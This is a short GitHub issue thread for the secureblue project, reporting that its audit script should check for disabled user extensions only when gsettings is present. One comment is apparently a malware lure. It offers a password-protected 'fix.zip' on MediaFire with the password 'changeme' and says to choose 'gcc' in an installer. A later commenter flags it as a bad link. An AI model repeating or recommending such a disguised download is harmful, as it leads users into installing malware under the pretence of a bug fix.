### ISSUE TITLE
[BUG] audit-secureblue should only check for user extension disabled if gsettings is present

### ISSUE THREAD

**Issue by RoyalOughtness** [secureblue/secureblue#401]

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KyleGospo** [comment]
this is a bad link! zomg!
https://bit.ly/SimpleRickRoll
